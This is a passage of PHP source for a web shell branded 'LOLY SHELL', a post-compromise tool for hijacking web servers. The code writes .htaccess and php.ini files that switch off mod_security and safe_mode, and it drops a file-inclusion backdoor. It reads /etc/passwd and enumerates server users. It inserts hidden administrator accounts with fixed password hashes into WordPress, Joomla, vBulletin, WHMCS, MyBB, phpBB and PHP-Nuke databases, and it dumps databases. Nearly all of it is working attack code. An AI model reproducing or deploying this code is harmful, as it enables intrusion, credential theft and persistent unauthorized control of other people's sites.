1578 <form action="?action=disfunc&submit=bypass&bypass=apache&dir=<?php echo $path ?>" method="post">
1579 <input type="submit" value="htaccess apache" />
1580 </form>
1581
1582 </td><td>
1583
1584 <form action="?action=disfunc&submit=bypass&bypass=litespeed&dir=<?php echo $path ?>" method="post">
1585 <input type="submit" value="htaccess litespeed" />
1586 </form>
1587 </td><td>
1588 <form action="?action=disfunc&submit=bypass&bypass=phpini&dir=<?php echo $path ?>" method="post">
1589 <input type="submit" value="php.ini" />
1590 </form>
1591 </td>
1592 <td>
1593 <form action="?action=disfunc&submit=bypass&bypass=etcpasswd&dir=<?php echo $path ?>" method="post">
1594 <input type="submit" value="Read etc/passwd" />
1595 </form>
1596
1597 </td>
1598 <td>
1599 <form action="?action=disfunc&submit=bypass&bypass=readusers&dir=<?php echo $path ?>" method="post">
1600 <input type="submit" value="Read Users" />
1601 </form>
1602
1603 </td></tr>
1604 </table>
1605 </center>
1606 <?php
1607
1608 if(isset($_REQUEST['submit']) && $_REQUEST['submit']=="bypass"){
1609
1610 $bypass = $_REQUEST['bypass'];
1611
1612 if($bypass=="apache"){
1613 ?>
1614
1615 <?php
1616 $fil=fopen($path."/".".htaccess","w");
1617fwrite($fil,'#Generated By FirmanCyb#erLoly_
1618<IfModule mod_security.c>
1619Sec------Engine Off
1620Sec------ScanPOST Off
1621</IfModule>');
1622fclose($fil);
1623echo '<script>alert("htaccess for Apache was created.");document.location.href="?action=disfunc&dir='.$path.'";</script>';
1624
1625?>
1626 <?php
1627 } elseif($bypass=="phpini"){
1628 ?>
1629 <?php
1630 $fil=fopen($path."/"."php.ini","w");
1631fwrite($fil,'safe_mode=OFF
1632disable_functions=ByPass By FirmanCyb#erLoly_');
1633fclose($fil);
1634$file2=fopen($path."/"."ini.php","w");
1635fwrite($file2,'<?
1636echo ini_get("safe_mode");
1637echo ini_get("open_basedir");
1638include($_GET["file"]);
1639ini_restore("safe_mode");
1640ini_restore("open_basedir");
1641echo ini_get("safe_mode");
1642echo ini_get("open_basedir");
1643include($_GET["ss"]);
1644?>');
1645fclose($file2);
1646echo '<script>alert("php.ini && ini.php was created.");document.location.href="?action=disfunc&dir='.$path.'";</script>';
1647?>
1648
1649 <?php
1650
1651 } elseif($bypass=="litespeed"){
1652 ?>
1653 <?php
1654 $fil=fopen($path."/".".htaccess","w");
1655fwrite($fil,'#Generated By FirmanCyb#erLoly_
1656<Files *.php>
1657ForceType application/x-httpd-php4
1658</Files>
1659ahm tas: <IfModule mod_security.c>
1660SecFilterEngine Off
1661SecFilterScanPOST Off
1662</IfModule>');
1663fclose($fil);
1664echo '<script>alert("htaccess for Litespeed was created.");document.location.href="?action=disfunc&dir='.$path.'";</script>';
1665?>
1666 <?php
1667
1668 } elseif($bypass=="etcpasswd"){
1669 echo '<br><pre style="border:2px solid #CE3F3F;padding:5px;margin:0;overflow: auto;">';
1670 if(function_exists("system") || function_exists("exec") || function_exists("passthru") || function_exists("shell_exec")){
1671 echo extension("cat /etc/passwd");
1672 }
1673 elseif(function_exists("file_get_contents") && is_readable("/etc/passwd")){
1674 echo file_get_contents("/etc/passwd");
1675 }
1676 elseif(function_exists("posix_getpwuid")){
1677 for($uid=0;$uid<60000;$uid++){
1678 $ara = @posix_getpwuid($uid);
1679 if (!empty($ara)) {
1680 while (list ($key, $val) = each($ara)){
1681 print "$val:";
1682 }print "\n";}}
1683 } else{echo '<script>alert("Error in bypass...")</script>';}
1684 } elseif($bypass=="readusers"){
1685 if(!@file_exists("/etc/virtual/domainowners")){
1686 echo '<br><pre style="border:2px solid #CE3F3F;padding:5px;margin:0;overflow: auto;">';
1687 $i = 0;
1688 while ($i < 60000) {
1689 $line = posix_getpwuid($i);
1690 if (!empty($line)) {
1691 while (list ($key, $vl) = each($line)){
1692 echo $vl."\n";
1693 break;}}$i++;}
1694 }else{echo '<pre style="border:2px solid #CE3F3F;padding:5px;margin:0;overflow: auto;"><br>';
1695 $users = @file("/etc/virtual/domainowners");
1696 foreach($users as $boz){
1697 $user = explode(":",$boz);
1698 echo trim($user[1]).'<br>';}}
1699 }
1700 }
1701
1702 ?>
1703
1704 <?php
1705 }
1706
1707 if($action=="info"){
1708 ?>
1709
1710 <br />
1711 <?php
1712 echo '<div class=phpinfo><style>.p {color:#000;}</style>';
1713ob_start();
1714phpinfo();
1715$tmp = ob_get_clean();
1716$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2, hr) {.*}!msiU','',$tmp);
1717$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
1718echo str_replace('<h1','<h2', $tmp) .'</div><br>';
1719 ?>
1720
1721 <?php
1722 }
1723 if($action=="aboutus"){
1724echo "<style>#aboutus{background: #A81F1F}</style>";
1725
1726 ?>
1727 <br />
1728 <center>
1729 <img src="https://s33.postimg.cc/ry7gh0vq7/lc_In_P8_H.png" /><br />
1730 <span style="color:#F00;font-size:20px">LOLY SHELL</span><br />
1731 <span style="font-size:19px">Developed By <a target="_blank" href="http://www.loly704.zone.id/">FirmanCyb#erLoly_</a></span><br />
1732
1733 <span>All member D704T</span><br />
1734 <span>Our Residence: <a href="http://www.indoxploit.or.id" target="_blank">IndoXploit</a><br />
1735 <span><br>IndoXploit Coders Team</span><br />
1736 </center>
1737 <?php
1738 }
1739 if($action=="rmshell"){
1740 echo "<style>#rmshell{background: #A81F1F}</style>";
1741
1742 ?>
1743
1744 <form action="?action=rmshell" method="post">
1745 <span>Do You Really Want To Remove Shell?</span>
1746 <input type="submit" value="Yes" name="accept" style="cursor: pointer"/>
1747 <input type="button" value="No" onclick="window.location.href='?action=explorer'" style="cursor: pointer"/>
1748 </form>
1749
1750 <?php
1751 if(isset($_POST['accept']) && $_POST['accept'] != "" && $_POST['accept']=="Yes"){
1752
1753if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
1754die('<b>Sheller has been removed</i> :)</b>');
1755else
1756echo 'unlink error!';
1757
1758
1759 }
1760
1761
1762 }
1763
1764
1765if($action=="pwchanger"){
1766
1767?>
1768<center>
1769<br>
1770<div class="pwchanger">
1771<a href="?action=pwchanger&cms=wp"><input type="button" value="Wordpress"></a>
1772<a href="?action=pwchanger&cms=joomla"><input type="button" value="Joomla"></a>
1773<a href="?action=pwchanger&cms=vb"><input type="button" value="vBulletin"></a>
1774<a href="?action=pwchanger&cms=whmcs"><input type="button" value="WHMCS"></a>
1775<a href="?action=pwchanger&cms=mybb"><input type="button" value="MyBB"></a>
1776<a href="?action=pwchanger&cms=phpbb"><input type="button" value="phpBB"></a>
1777<a href="?action=pwchanger&cms=phpnuke"><input type="button" value="phpNuke"></a>
1778</div>
1779</center>
1780<?php
1781
1782if(isset($_GET['cms']) && $_GET['cms']!=""){
1783$cms=$_GET['cms'];
1784if($cms=="wp"){
1785?>
1786<br>
1787<b>ADD NEW ADMIN WORDPRESS</b>
1788<form action="?action=pwchanger&cms=wp" method="POST">
1789<table>
1790<tr><td>Host :</td>
1791<td><input size="30" value="localhost" name="localhost" type="text"></td></tr>
1792<tr><td>Database :</td>
1793<td> <input size="30" value="" name="database" type="text"></td></tr>
1794<tr><td>Table Prefix :</td>
1795<td><input size="30" value="wp_" name="prefix" type="text"></td></tr>
1796<tr><td>Username : </td>
1797<td> <input size="30" value="" name="username" type="text"></td></tr>
1798<tr><td>Password :</td>
1799<td> <input size="30" value="" name="password" type="text"></td></tr>
1800<tr><td>Admin Username:</td>
1801<td><input name="admin" size="30" value="admin"></td></tr>
1802<tr><td>Admin Password: </td>
1803<td><input name="pass" size="30" value="ashiyane" disabled /></td></tr>
1804<tr><td><Admin Email:</td>
1805<td><input name="email" size="30" value="info@ashiyane.ir"></td></tr>
1806</table>
1807<input value="Change" name="submit" type="submit">
1808</form>
1809
1810
1811<?php
1812
1813
1814if (isset($_POST['submit']) && $_POST['submit'] == 'Change'){
1815
1816 $localhost = $_POST['localhost'];
1817 $database = $_POST['database'];
1818 $username = $_POST['username'];
1819 $password = $_POST['password'];
1820 $admin = $_POST['admin'];
1821 $email = $_POST['email'];
1822 $prefix = $_POST['prefix'];
1823 @mysql_connect($localhost,$username,$password) or die(mysql_error());
1824 @mysql_select_db($database) or die(mysql_error());
1825 $result=@mysql_query("insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,'$admin','dfcaf717b6731a6f62baabad524a8517','$email')") or die(mysql_error());
1826 $result=@mysql_query("select ID from ".$prefix."users where user_login='".$admin."'") or die(mysql_error());
1827 $res = mysql_num_rows($result);
1828 if ($res == 1){
1829 $resvis = mysql_fetch_assoc($result);
1830 $res = $resvis['ID'];
1831 }
1832 $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','first_name','result')") or die(mysql_error());
1833 $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','last_name','result')") or die(mysql_error());
1834 $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','nickname','result')") or die(mysql_error());
1835 $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','description','result')") or die(mysql_error());
1836 $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','rich_editing','true')") or die(mysql_error());
1837 $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','comment_shortcuts','false')") or die(mysql_error());
1838 $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','admin_color','fresh')") or die(mysql_error());
1839 $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','use_ssl','0')") or die(mysql_error());
1840 $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','show_admin_bar_front','true')") or die(mysql_error());
1841 $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','wp_capabilities','a:1:{s:13:\"administrator\";b:1;}')") or die(mysql_error());
1842 $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','wp_user_level','10')") or die(mysql_error());
1843 $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','dismissed_wp_pointers','wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media')") or die(mysql_error());
1844 $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','show_welcome_panel','1')") or die(mysql_error());
1845 $result=@mysql_query("insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','wp_dashboard_quick_press_last_post_id','3')") or die(mysql_error());
1846 if($result){
1847 echo "<center><br><b><script>alert('".$admin." is created successfully.')</script></b></center> ";
1848 }
1849
1850
1851
1852}
1853
1854}
1855
1856if($cms=="joomla"){
1857?>
1858<br>
1859<b>ADD NEW ADMIN JOOMLA</b>
1860<form action="?action=pwchanger&cms=joomla" method="POST">
1861<table>
1862<tr><td>Host :</td>
1863<td><input size="30" value="localhost" name="localhost" type="text"></td></tr>
1864<tr><td>Database :</td>
1865<td> <input size="30" value="" name="database" type="text"></td></tr>
1866<tr><td>Table Prefix :</td>
1867<td><input size="30" value="jos_" name="prefix" type="text"></td></tr>
1868<tr><td>Username : </td>
1869<td> <input size="30" value="" name="username" type="text"></td></tr>
1870<tr><td>Password :</td>
1871<td> <input size="30" value="" name="password" type="text"></td></tr>
1872<tr><td>Admin Username:</td>
1873<td><input name="admin" size="30" value="admin"></td></tr>
1874<tr><td>Admin Password: </td>
1875<td><input name="pass" size="30" value="ashiyane" disabled /></td></tr>
1876<tr><td>Admin Email:</td>
1877<td><input name="email" size="30" value="info@ashiyane.ir"></td></tr>
1878</table>
1879<input value="Change" name="submit" type="submit">
1880</form>
1881
1882<?php
1883if (isset($_POST['submit']) && $_POST['submit'] == 'Change'){
1884
1885 $localhost = $_POST['localhost'];
1886 $database = $_POST['database'];
1887 $username = $_POST['username'];
1888 $password = $_POST['password'];
1889 $admin = $_POST['admin'];
1890 $email = $_POST['email'];
1891 $prefix = $_POST['prefix'];
1892 @mysql_connect($localhost,$username,$password) or die(mysql_error());
1893 @mysql_select_db($database) or die(mysql_error());
1894 $result=@mysql_query("insert into ".$prefix."users (id,name,username,email,password) values(null,'Super User','".$admin."','".$email."','dfcaf717b6731a6f62baabad524a8517')") or die(mysql_error());
1895 $result=@mysql_query("select id from ".$prefix."users where username='".$admin."'") or die(mysql_error());
1896 $res = mysql_num_rows($result);
1897 if ($res == 1){
1898 $resvis = mysql_fetch_assoc($result);
1899 $res = $resvis['id'];
1900 }
1901 $result=@mysql_query("INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES ('".$res."', '8')") or die(mysql_error());
1902 if($result){
1903 echo "<center><br><b><script>alert('".$admin." is created successfully.')</script></b></center> "; }
1904
1905
1906}
1907
1908}
1909
1910if($cms=="vb"){
1911 ?>
1912 <br>
1913 <b>ADD NEW ADMIN VBULLETIN</b>
1914<form action="?action=pwchanger&cms=vb" method="POST">
1915<table>
1916<tr><td>Host :</td>
1917<td><input size="30" value="localhost" name="localhost" type="text"></td></tr>
1918<tr><td>Database :</td>
1919<td> <input size="30" value="" name="database" type="text"></td></tr>
1920<tr><td>Table Prefix :</td>
1921<td><input size="30" value="" name="prefix" type="text"></td></tr>
1922<tr><td>Username : </td>
1923<td> <input size="30" value="" name="username" type="text"></td></tr>
1924<tr><td>Password :</td>
1925<td> <input size="30" value="" name="password" type="text"></td></tr>
1926<tr><td>Admin Username:</td>
1927<td><input name="admin" size="30" value="admin"></td></tr>
1928<tr><td>Admin Password: </td>
1929<td><input name="pass" size="30" value="ashiyane" disabled /></td></tr>
1930<tr><td>Admin Email:</td>
1931<td><input name="email" size="30" value="info@ashiyane.ir"></td></tr>
1932</table>
1933<input value="Change" name="submit" type="submit">
1934</form>
1935<?php
1936 if (isset($_POST['submit']) && $_POST['submit'] == 'Change'){
1937
1938 $localhost = $_POST['localhost'];
1939 $database = $_POST['database'];
1940 $username = $_POST['username'];
1941 $password = $_POST['password'];
1942 $admin = $_POST['admin'];
1943 $email = $_POST['email'];
1944 $prefix = $_POST['prefix'];
1945 @mysql_connect($localhost,$username,$password) or die(mysql_error());
1946 @mysql_select_db($database) or die(mysql_error());
1947
1948 $result=@mysql_query("insert into {$prefix}user (userid,usergroupid,username,password,salt,email) values(null,'6','$admin','efacb3b2c13f0363459bffe5d6f30631','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','$email')") or die(mysql_error());
1949 $result=@mysql_query("select userid from {$prefix}user where username='".$admin."'") or die(mysql_error());
1950 $res = mysql_num_rows($result);
1951 if ($res == 1){
1952 $resvis = mysql_fetch_assoc($result);
1953 $res = $resvis['userid'];
1954 }
1955 $result=@mysql_query("insert into {$prefix}administrator (userid,adminpermissions) values('".$res."','16744444')") or die(mysql_error());
1956 if($result){
1957 echo "<center><br><b><script>alert('".$admin." is created successfully.')</script></b></center> "; }
1958 }
1959}
1960
1961if($cms=="phpbb"){
1962?>
1963<br>
1964<b>ADD NEW ADMIN PHPBB</b>
1965<form action="?action=pwchanger&cms=phpbb" method="POST">
1966<table>
1967<tr><td>Host :</td>
1968<td><input size="30" value="localhost" name="localhost" type="text"></td></tr>
1969<tr><td>Database :</td>
1970<td> <input size="30" value="" name="database" type="text"></td></tr>
1971<tr><td>Table Prefix :</td>
1972<td><input size="30" value="" name="prefix" type="text"></td></tr>
1973<tr><td>Username : </td>
1974<td> <input size="30" value="" name="username" type="text"></td></tr>
1975<tr><td>Password :</td>
1976<td> <input size="30" value="" name="password" type="text"></td></tr>
1977<tr><td>Admin Username:</td>
1978<td><input name="admin" size="30" value="admin"></td></tr>
1979<tr><td>Admin Password: </td>
1980<td><input name="pass" size="30" value="ashiyane" disabled /></td></tr>
1981<tr><td>Admin Email:</td>
1982<td><input name="email" size="30" value="info@ashiyane.ir"></td></tr>
1983</table>
1984<input value="Change" name="submit" type="submit">
1985</form>
1986
1987<?php
1988if (isset($_POST['submit']) && $_POST['submit'] == 'Change'){
1989
1990 $localhost = $_POST['localhost'];
1991 $database = $_POST['database'];
1992 $username = $_POST['username'];
1993 $password = $_POST['password'];
1994 $admin = $_POST['admin'];
1995 $pass = $_POST['pass'];
1996 $email = $_POST['email'];
1997 $prefix = $_POST['prefix'];
1998 $hash = md5($pass);
1999 @mysql_connect($localhost,$username,$password) or die(mysql_error());
2000 @mysql_select_db($database) or die(mysql_error());
2001 $result=@mysql_query("UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE username_clean = 'admin'") or die(mysql_error());
2002 $result=@mysql_query("UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE username_clean = 'admin'") or die(mysql_error());
2003 $result=@mysql_query("UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE user_type = 3") or die(mysql_error());
2004 $result=@mysql_query("UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE user_type = 3") or die(mysql_error());
2005 $result=@mysql_query("UPDATE ".$prefix."users SET user_email ='".$SQL."' WHERE username_clean = 'admin'") or die(mysql_error());
2006 if($result){
2007 echo "<center><br><b><script>alert('".$admin." is created successfully.')</script></b></center> ";
2008 }
2009
2010
2011}
2012}
2013
2014if($cms=="whmcs"){
2015
2016 ?>
2017 <br>
2018 <b>ADD NEW ADMIN WHMCS</b>
2019<form action="?action=pwchanger&cms=whmcs" method="POST">
2020<table>
2021<tr><td>Host :</td>
2022<td><input size="30" value="localhost" name="localhost" type="text"></td></tr>
2023<tr><td>Database :</td>
2024<td> <input size="30" value="" name="database" type="text"></td></tr>
2025<tr><td>Username : </td>
2026<td> <input size="30" value="" name="username" type="text"></td></tr>
2027<tr><td>Password :</td>
2028<td> <input size="30" value="" name="password" type="text"></td></tr>
2029<tr><td>Admin Username:</td>
2030<td><input name="admin" size="30" value="admin"></td></tr>
2031<tr><td>Admin Password: </td>
2032<td><input name="pass" size="30" value="ashiyane" disabled /></td></tr>
2033<tr><td>Admin Email:</td>
2034<td><input name="email" size="30" value="info@ashiyane.ir"></td></tr>
2035</table>
2036<input value="Change" name="submit" type="submit">
2037</form>
2038
2039 <?php
2040 if (isset($_POST['submit']) && $_POST['submit'] == 'Change'){
2041
2042 $localhost = $_POST['localhost'];
2043 $database = $_POST['database'];
2044 $username = $_POST['username'];
2045 $password = $_POST['password'];
2046 $admin = $_POST['admin'];
2047 $email = $_POST['email'];
2048
2049 @mysql_connect($localhost,$username,$password) or die(mysql_error());
2050 @mysql_select_db($database) or die(mysql_error());
2051 $result=@mysql_query("insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','".$admin."','dfcaf717b6731a6f62baabad524a8517','".$email."','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysql_error());
2052 if($result){
2053 echo "<center><br><b><script>alert('".$admin." is created successfully.')</script></b></center> ";
2054 }
2055
2056 }
2057
2058}
2059
2060if($cms=="mybb"){
2061
2062?>
2063<br>
2064<b>ADD NEW ADMIN MYBB</b>
2065<form action="?action=pwchanger&cms=mybb" method="POST">
2066<table>
2067<tr><td>Host :</td>
2068<td><input size="30" value="localhost" name="localhost" type="text"></td></tr>
2069<tr><td>Database :</td>
2070<td> <input size="30" value="" name="database" type="text"></td></tr>
2071<tr><td>Table Prefix :</td>
2072<td><input size="30" value="" name="prefix" type="text"></td></tr>
2073<tr><td>Username : </td>
2074<td> <input size="30" value="" name="username" type="text"></td></tr>
2075<tr><td>Password :</td>
2076<td> <input size="30" value="" name="password" type="text"></td></tr>
2077<tr><td>Admin Username:</td>
2078<td><input name="admin" size="30" value="admin"></td></tr>
2079<tr><td>Admin Password: </td>
2080<td><input name="pass" size="30" value="ashiyane" disabled /></td></tr>
2081<tr><td>Admin Email:</td>
2082<td><input name="email" size="30" value="info@ashiyane.ir"></td></tr>
2083</table>
2084<input value="Change" name="submit" type="submit">
2085</form>
2086
2087<?php
2088
2089 if (isset($_POST['submit']) && $_POST['submit'] == 'Change'){
2090
2091 $localhost = $_POST['localhost'];
2092 $database = $_POST['database'];
2093 $username = $_POST['username'];
2094 $password = $_POST['password'];
2095 $admin = $_POST['admin'];
2096 $email = $_POST['email'];
2097 $prefix = $_POST['prefix'];
2098 @mysql_connect($localhost,$username,$password) or die(mysql_error());
2099 @mysql_select_db($database) or die(mysql_error());
2100 $result=@mysql_query("insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,'".$admin."','c93bfab2a4d210f8cbf8bc0fcfbba67b','ywza68lS','".$email."','4')") or die(mysql_error());
2101 if($result){
2102 echo "<center><br><b><script>alert('".$admin." is created successfully.')</script></b></center> ";
2103 }
2104 }
2105 }
2106
2107if($cms=="phpnuke"){
2108
2109 ?>
2110 <br>
2111 <b>ADD NEW ADMIN PHP NUKE</b>
2112 <form action="?action=pwchanger&cms=phpnuke" method="POST">
2113<table>
2114<tr><td>Host :</td>
2115<td><input size="30" value="localhost" name="localhost" type="text"></td></tr>
2116<tr><td>Database :</td>
2117<td> <input size="30" value="" name="database" type="text"></td></tr>
2118<tr><td>Table Prefix :</td>
2119<td><input size="30" value="" name="prefix" type="text"></td></tr>
2120<tr><td>Username : </td>
2121<td> <input size="30" value="" name="username" type="text"></td></tr>
2122<tr><td>Password :</td>
2123<td> <input size="30" value="" name="password" type="text"></td></tr>
2124<tr><td>Admin Username:</td>
2125<td><input name="admin" size="30" value="admin"></td></tr>
2126<tr><td>Admin Password: </td>
2127<td><input name="pass" size="30" value="ashiyane" disabled /></td></tr>
2128<tr><td>Admin Email:</td>
2129<td><input name="email" size="30" value="info@ashiyane.ir"></td></tr>
2130</table>
2131<input value="Change" name="submit" type="submit">
2132</form>
2133
2134 <?php
2135 if (isset($_POST['submit']) && $_POST['submit'] == 'Change'){
2136 $localhost = $_POST['localhost'];
2137 $database = $_POST['database'];
2138 $username = $_POST['username'];
2139 $password = $_POST['password'];
2140 $admin = $_POST['admin'];
2141 $email = $_POST['email'];
2142 $prefix = $_POST['prefix'];
2143 @mysql_connect($localhost,$username,$password) or die(mysql_error());
2144 @mysql_select_db($database) or die(mysql_error());
2145 @mysql_connect($localhost,$username,$password) or die(mysql_error());
2146 @mysql_select_db($database) or die(mysql_error());
2147 $result=@mysql_query("insert into ".prefix."_authors(aid,name,email,pwd) values('$admin','God','$email','dfcaf717b6731a6f62baabad524a8517')") or die(mysql_error());
2148 if($result){
2149 echo "<center><br><b><script>alert('".$admin." is created successfully.')</script></b></center> ";
2150 }
2151 }
2152
2153}
2154}
2155}
2156
2157 //sql connector ~ by Mast3r 0mid
2158 if($action=="sql"){
2159 echo "<style>#sql{background: #A81F1F}</style>";
2160
2161$pwd = realpath(".")."\\";
2162 function backup_tables($host,$user,$pass,$name,$tables = '*')
2163 {
2164
2165 $link = mysql_connect($host,$user,$pass);
2166 mysql_select_db($name,$link);
2167
2168 //get all of the tables
2169 if($tables == '*')
2170 {
2171 $tables = array();
2172 $result = mysql_query('SHOW TABLES');
2173 while($row = mysql_fetch_row($result))
2174 {
2175 $tables[] = $row[0];
2176 }
2177 }
2178 else
2179 {
2180 $tables = is_array($tables) ? $tables : explode(',',$tables);
2181 }
2182
2183 //cycle through
2184 foreach($tables as $table)
2185 {
2186 $result = mysql_query('SELECT * FROM '.$table);
2187 $num_fields = mysql_num_fields($result);
2188
2189 $return= 'DROP TABLE '.$table.';';
2190 $row2 = mysql_fetch_row(mysql_query('SHOW CREATE TABLE '.$table));
2191 $return.= "\n\n".$row2[1].";\n\n";
2192
2193 for ($i = 0; $i < $num_fields; $i++)
2194 {
2195 while($row = mysql_fetch_row($result))
2196 {
2197 $return.= 'INSERT INTO '.$table.' VALUES(';
2198 for($j=0; $j<$num_fields; $j++)
2199 {
2200 $row[$j] = addslashes($row[$j]);
2201 $row[$j] = ereg_replace("\n","\\n",$row[$j]);
2202 if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
2203 if ($j<($num_fields-1)) { $return.= ','; }
2204 }
2205 $return.= ");\n";
2206 }
2207 }
2208 $return.="\n\n\n";
2209 }
2210
2211 //save file
2212 $handle = fopen('db-backup'.time().'-'.(md5(implode(',',$tables))).'.sql','w+');
2213 fwrite($handle,$return);
2214
2215
2216 fclose($handle);
2217 }
2218
2219
2220if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport']))
2221 {
2222
2223
2224
2225 $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport'];
2226 if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass))
2227 {
2228 $msg = "";
2229 $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
2230 $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport;
2231 $msg .= " <span class=\"gaya\">-></span> <a href=\"?action=sql&y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&\">[ databases ]</a>";
2232 if(isset($_GET['db']))
2233 $msg .= " <span class=\"gaya\">-></span>
2234 <a href=\"?action=sql&y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>";
2235 if(isset($_GET['table']))
2236 $msg .= " <span class=\"gaya\">->
2237 </span>
2238 <a href=\"?action=sql&y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."&table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>";
2239 $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";
2240 $msg .= "</div>";
2241 echo $msg;
2242 if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery'])))
2243 {
2244 $db = $_GET['db'];
2245
2246
2247 echo "<a href=\"?action=sql&y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."&dump\">"."<input type='button' value='Dump Current DB'>"."</a>";
2248
2249 if(isset($_GET['dump'])){
2250 backup_tables($sqlhost,$sqluser,$sqlpass,$db);
2251 echo "Successully Dumped.";
2252
2253
2254 }
2255 $query = "DROP TABLE IF EXISTS Newbie3viLc063s0_table;
2256 \nCREATE TABLE `Ashiyane Digital Security Team` ( `file` LONGBLOB NOT NULL );
2257 \nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE Mast3r_table;SELECT * FROM Ashiyane_table;
2258 \nDROP TABLE IF EXISTS Ashiyane_table;";
2259 $msg = "<div style=\"width:99%;padding:0 10px;\">
2260 <form action=\"?\" method=\"get\">
2261 <input type=\"hidden\" name=\"action\" value=\"sql\" />
2262 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
2263 <input type=\"hidden\" name=\"x\" value=\"mysql\" />
2264 <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
2265 <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
2266 <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
2267 <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
2268 <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
2269 <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p>
2270 <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
2271 </form>
2272 </div> ";
2273 $tables = array();
2274 $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".htmlspecialchars($db)."</th></tr>";
2275 $hasil = @mysql_list_tables($db,$con);
2276 while(list($table) = @mysql_fetch_row($hasil))
2277 { @array_push($tables,$table); }
2278 @sort($tables);
2279 foreach($tables as $table)
2280 {
2281 $msg .= "<tr><td><a href=\"?action=sql&y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."&table=".$table."\">$table</a></td></tr>";
2282 }
2283 $msg .= "</table>";
2284 }
2285 elseif(isset($_GET['table']) && (!isset($_GET['sqlquery'])))
2286 {
2287 $db = $_GET['db'];
2288 $table = $_GET['table'];
2289 $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";
2290 $msgq = "<div style=\"width:99%;padding:0 10px;\">
2291 <form action=\"?\" method=\"get\">
2292 <input type=\"hidden\" name=\"action\" value=\"sql\" />
2293 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
2294 <input type=\"hidden\" name=\"x\" value=\"mysql\" />
2295 <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
2296 <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
2297 <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
2298 <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
